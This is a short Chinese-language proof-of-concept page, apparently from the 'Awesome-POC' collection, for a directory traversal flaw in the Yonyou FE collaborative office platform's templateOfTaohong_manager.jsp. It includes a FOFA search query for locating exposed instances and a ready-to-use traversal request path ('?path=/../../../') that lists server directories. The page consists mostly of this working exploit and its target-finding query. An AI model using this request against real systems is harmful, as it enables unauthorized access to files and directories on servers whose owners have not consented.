Awesome-POC/OA产品漏洞/用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞.md
2022-05-20 15:57:09 +08:00

681 B
Raw Blame History

用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

漏洞描述

用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞通过漏洞攻击者可以获取目录文件等信息导致进一步攻击

漏洞影响

用友 FE协作办公平台

FOFA

"FE协作"

漏洞复现

登录页面

image-20220520141413849

验证POC

/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../

image-20220520141519859